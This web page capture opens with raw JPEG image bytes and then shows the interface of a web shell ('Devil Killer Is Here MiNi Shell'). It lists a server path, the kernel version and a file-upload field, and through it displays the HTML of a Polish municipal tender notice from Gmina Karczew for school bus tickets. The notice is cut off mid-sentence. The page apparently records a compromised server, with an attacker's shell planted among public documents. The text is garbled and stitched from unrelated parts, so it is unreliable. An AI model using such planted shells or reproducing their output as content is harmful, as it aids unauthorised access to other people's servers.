JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20250702/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20250702/0030358101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Sprzedaż i dostawa do siedziby Zamawiającego biletów miesięcznych dla uprawnionych do przewozu uczniów uczęszczających do szkół prowadzonych przez Gminę Karczew, w roku szkolnym 2025/2026 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Karczew</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013269226</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Warszawska 28</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Karczew</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-480</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 22 780 65 88</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">m.szulc@karczew.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.karczew.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sprzedaż i dostawa do siedziby Zamawiającego biletów miesięcznych dla uprawnionych do przewozu uczniów uczęszczających do szkół prowadzonych przez Gminę Karczew, w roku szkolnym 2025/2026 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cb7c237d-7b2a-45c3-ae6e-1af75f0a2617</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00303581</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00037159/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Sprzedaż i dostawa do siedziby Zamawiającego biletów miesięcznych dla uprawnionych do przewozu uczniów z Gminy Karczew do placówek oświatowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://karczew.logintrade.net/zapytania_email,202998,2a782460536346be5351302ccc970a2b.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się za pośrednictwem:<br/>1)Platformy przetargowej – adres podany jest w punkcie 8.2.) niniejszego Ogłoszenia;<br/>2) Zamawiający dopuszcza komunikację za pośrednictwem poczty elektronicznej: m.szulc@karczew.pl, z zastrzeżeniem, że złożenie oferty następuje wyłącznie poprzez Platformę przetargową.<br/>W korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem referencyjnym sprawy ZP.271.9.2025.MS.<br/>Szczegóły w punkcie 8 SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Oferta musi być podpisana kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym.<br/>2. Wykonawca zamierzający złożyć ofertę (wyłącznie poprzez Platformę przetargową) – zobowiązany jest zapoznać się z instrukcjami użytkowników Platformy przetargowej dostępnymi pod adresem:<br/>https://karczew.logintrade.net/rejestracja/instrukcje.html<br/>oraz zaakceptować regulamin korzystania z Platformy przetargowej<br/>dostępny pod adresem:<br/>https://karczew.logintrade.net/rejestracja/regulamin.html<br/>3. Złożenie oferty poprzez Platformę przetargową oznacza akceptację regulaminu, o którym mowa w pkt 2.<br/>4. Wymagania techniczne związane z korzystaniem z Platformy przetargowej – wskazane są na stronie internetowej Platformy przetargowej – pod adresem:<br/>https://karczew.logintrade.net/rejestracja/instrukcje.html<br/>5. Sposoby złożenia oferty za pośrednictwem Platformy przetargowej oraz potwierdzenia złożenia oferty – w zależności od wyboru opcji z logowaniem lub bez logowania–zostały opisane w Instrukcjach użytkowników Platformy przetargowej.<br/>6. Wsparcia technicznego w zakresie działania Platformy przetargowej udziela jej dostawca tj.: Logintrade S.A., ul. Legnicka 57D, lokal B/J, 54-203 Wrocław. W przypadku ewentualnych problemów technicznych prosimy o kontakt z infolinią techniczną +48 71 787 35 34; e-mail: helpdesk@logintrade.net od poniedziałku do piątku (dni robocze) w godz. 8:00 – 16:00.<br/>7. Oferty, oświadczenia, o których mowa w art. 125 ust. 1 ustawy, podmiotowe środki dowodowe, w tym oświadczenie, o którym mowa w art. 117 ust. 4 ustawy, oraz zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy, zwane dalej „zobowiązaniem podmiotu udostępniającego zasoby”, przedmiotowe środki dowodowe, pełnomocnictwo, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2024 r. poz. 1557 z późn. zm.), z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy, z uwzględnieniem rodzaju przekazywanych danych.<br/>Pozostałe postanowienia zgodnie z treścią SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Opis w punkcie 37 Specyfikacji Warunków Zamówienia (SWZ).</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Opis w punkcie 37 Specyfikacji Warunków Zamówienia (SWZ).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.9.2025.MS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sprzedaż i dostawa do siedziby Zamawiającego biletów miesięcznych dla uprawnionych do przewozu uczniów z Gminy Karczew do placówek oświatowych, tj.: 1) Szkoły Podstawowej Nr 1 w Karczewie; 2) Szkoły Podstawowej w Glinkach; 3) Szkoły Podstawowej w Sobiekursku; – prowadzonych przez Gminę Karczew, w ramach regularnego przewozu wraz z opieką na czas przewozu, na każdy miesiąc w roku szkolnym 2025/2026 (wrzesień – czerwiec) na trasach określonych w Szczegółowym Opisie Przedmiotu Zamówienia, stanowiącym Załącznik Nr 1 do SWZ. Orientacyjna liczba uczniów z Gminy Karczew uprawniona do dowozu do placówek oświatowych wynosi 254 uczniów (biletów) miesięcznie (stan na dzień publikacji Ogłoszenia o zamówieniu). W całym okresie realizacji zamówienia (tj. w okresie 10 miesięcy) liczba biletów zakupionych przez Zamawiającego nie przekroczy liczby 2700 sztuk (maksymalnie). Miesięcznie liczba biletów zakupionych przez Zamawiającego nie przekroczy liczby 270 sztuk (maksymalnie). Szczegółowo przedmiot zamówienia określa Szczegółowy Opis Przedmiotu Zamówienia – stanowiący Załącznik Nr 1 do SWZ. Wykaz przystanków autobusowych stanowi Załącznik Nr 7 do SWZ. Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych w projektowanych Postanowieniach Umowy (PPU) stanowiących Załącznik Nr 2 do SWZ. Załączniki szczegółowo wymienione są w punkcie 39 SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-06-26</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Określenie zakresu usługi – wykonanie usługi polegającej na powtórzeniu podobnych usług do zamówienia podstawowego w tym m. in.: sprzedaż i dostawa do siedziby Zamawiającego biletów miesięcznych dla uprawnionych do przewozu uczniów szkół prowadzonych przez Gminę Karczew, w ramach regularnego przewozu wraz z opieką na czas przewozu – stanowiących nie więcej niż 20% wartości zamówienia podstawowego. Warunki, na jakich zostaną udzielone te usługi: umowa zostanie zawarta po przeprowadzeniu negocjacji z Wykonawcą na warunkach nie gorszych niż określone w Projektowanych Postanowieniach Umowy (dla zamówienia podstawowego).</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający podda ocenie oferty niepodlegające odrzuceniu. Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska najwyższą łączną liczbę punktów w ramach przyjętego kryterium oceny ofert. Szczegółowe informacje w punkcie 25 Specyfikacji Warunków Zamówienia (SWZ).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> [Numeracja zgodna z SWZ]:<br/>13.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu (na zasadach określonych w punkcie 12. SWZ);<br/>2) spełniają warunki udziału w postępowaniu określone przez Zamawiającego, w następującym zakresie:<br/>(…)<br/>13.1.2 uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>13.1.2.1 Zamawiający uzna warunek za spełniony jeżeli Wykonawca posiada aktualną licencję uprawniającą do przewozu osób, wymaganą przepisami ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2024 r., poz. 728 z późn. zm.).<br/>Uwagi:<br/>1) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek dotyczący uprawnienia Zamawiający uznana za spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada ww. wymagane uprawnienia (aktualna licencja), i zrealizuje usługi, do których realizacji te uprawnienia są wymagane;<br/>2) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia ocena spełniania ww. warunku nastąpi na podstawie złożonego wraz z ofertą oświadczenia o którym mowa w art. 117 ust. 4 ustawy Pzp, zgodnie z punktem 15.6.3 SWZ;<br/>3) Ocena spełniania ww. warunku nastąpi na podstawie złożonej przez Wykonawcę na wezwanie Zamawiającego aktualnej licencji, zgodnie z punktem 14.2.1.3 SWZ.<br/>(…)<br/>13.1.4 zdolności technicznej lub zawodowej;<br/>13.1.4.1 Wykonawca wykaże doświadczenie, że wykonał (zakończył) należycie w okresie ostatnich trzech (3) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał (lub jest w trakcie wykonywania) co najmniej jedno (1) zamówienie (umowę) polegające na świadczeniu usług przewozu osób (np.: dzieci, uczniów, osób dojeżdżających, itp.) świadczone środkiem/mi transportu drogowego (np.: autobus/y, autokar/y, itp.) z liczbą miejsc siedzących co najmniej 8 osób (każdy środek transportu), o wartości zamówienia minimum 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych) brutto.<br/>Uwagi: <br/>1) W przypadku, gdy przedmiotem zamówienia są świadczenia okresowe i ciągłe, Zamawiający dopuszcza nie tylko zamówienia wykonane (tj. zakończone), ale również wykonywane, z zastrzeżeniem, że zakres już wykonanych usług w ramach wykonywanego zamówienia musi potwierdzać spełnienie ww. warunku;<br/>2) Ocena spełniania ww. warunku nastąpi na podstawie złożonego przez Wykonawcę na wezwanie Zamawiającego wykazu zamówień z załączonymi dowodami określającymi, czy te zamówienia zostały wykonane lub są wykonywane należycie, zgodnie z punktem 14.2.1.2 SWZ;<br/>3) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. Jeśli Wykonawca wykazuje doświadczenie nabyte w ramach zamówienia/umowy realizowanego przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający nie dopuszcza by Wykonawca polegał na doświadczeniu grupy Wykonawców której był członkiem, jeżeli faktycznie i konkretnie nie wykonywał wykazanego zakresu prac. Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z innymi wykonawcami, wykaz o którym mowa w punkcie 14.2.1.2 SWZ, dotyczy usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia spełnianie warunku udziału w postępowaniu określonego w punkcie 13.1.4.1 SWZ oceniane będzie łącznie (tj. warunek winien spełnić jeden lub kilku Wykonawców wspólnie ubiegających się o udzielenie zamówienia);<br/>4) W przypadku polegania na zasobach innego Podmiotu (art. 118 ustawy Pzp) Zamawiający wymaga, by Podmiot na zasobach którego polega Wykonawca w celu potwierdzenia spełniania warunku udziału w postępowaniu samodzielnie wykazał spełnianie warunku udziału w postępowaniu, o którym mowa w punkcie 13.1.4.1 SWZ. Wykonawca może polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają usługi, do realizacji których te zdolności są wymagane;<br/>5) W przypadku, gdy Wykonawca wykonał w ramach zamówienia/umowy większy zakres prac, dla potrzeb niniejszego zamówienia powinien wyodrębnić tj. podać zakres i wartość zamówienia, o których mowa w punkcie 13.1.4.1 SWZ;<br/>6) W przypadku, gdy wartości, których dotyczą ww. warunki zostaną wyrażone w walucie innej niż PLN, ich przeliczenie na PLN nastąpi przyjmując jako podstawę średni kurs danej waluty opublikowany przez NBP (wg tabeli A kursów średnich walut obcych) w dniu publikacji ogłoszenia o zamówieniu. Jeżeli w tym dniu nie będzie opublikowany średni kurs NBP, Zamawiający przyjmie średni kurs z ostatniego dnia przed dniem publikacji. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">[Numeracja zgodna z SWZ]: 14.2 Podmiotowe środki dowodowe, które Wykonawca zobowiązany jest złożyć na wezwanie Zamawiającego:<br/>14.2.1.1. Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych w punkcie 12. SWZ (w tym: w punkcie 12.1; 12.2; 12.7), w tym w:<br/>a) art. 108 ust. 1 pkt 3 ustawy Pzp, dotyczących wydania prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne;<br/>b) art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego;<br/>c) art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie konkurencji;<br/>d) art. 108 ust. 1 pkt 6 ustawy Pzp, dotyczących zakłócenia konkurencji wynikającego z wcześniejszego zaangażowania Wykonawcy lub podmiotu, który należy z Wykonawcą do tej samej grupy kapitałowej, w przygotowanie postępowania o udzielenie zamówienia;<br/>e) art. 109 ust. 1 pkt 4 ustawy Pzp;<br/>f) art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego;<br/>– sporządzone według wzoru stanowiącego Załącznik Nr 9 do SWZ;<br/>Szczegółowe informacje zawarte są w punkcie 14 SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">[Numeracja zgodna z SWZ]: 14.2 Podmiotowe środki dowodowe, które Wykonawca zobowiązany jest złożyć na wezwanie Zamawiającego: 14.2.1.2 Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy – sporządzony według wzoru stanowiącego Załącznik Nr 6 do SWZ; 14.2.1.3 Aktualną licencję uprawniającą do przewozu osób, wymaganą przepisami ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2024 r., poz. 728 z późn. zm.).<br/>Szczegółowe informacje zawarte są w punkcie 14 SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> [Numeracja zgodna z SWZ]:<br/>Dokumenty, które Wykonawcy muszą złożyć wraz z ofertą (zgodnie z treścią punktu 21.5 SWZ):<br/>21.5.1. Formularz Ofertowy wypełniony według wzoru stanowiącego Załącznik Nr 3 do SWZ;<br/>Do oferty należy dołączyć aktualne dokumenty potwierdzające status prawny Wykonawcy, np. odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru.<br/>Wykonawca nie jest zobowiązany do złożenia ww. dokumentów, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów;<br/>21.5.2. Pełnomocnictwo do podpisania oferty (w przypadku gdy oferta została podpisana przez osobę/osoby nieupoważnione na podstawie dokumentów potwierdzających status prawny Wykonawcy, takich jak: odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru;<br/>21.5.3. Oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie wskazanym w punkcie 12. SWZ (w tym: w punkcie 12.1; 12.2; 12.7) i w punkcie 13. SWZ (w tym: w punkcie 13.1.2; 13.1.2.1; 13.1.4; 13.1.4.1), składane przez Wykonawcę/Wykonawców wspólnie ubiegających się o udzielenie zamówienia, sporządzone według wzoru stanowiącego Załącznik Nr 4 do SWZ;<br/>21.5.4. Oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 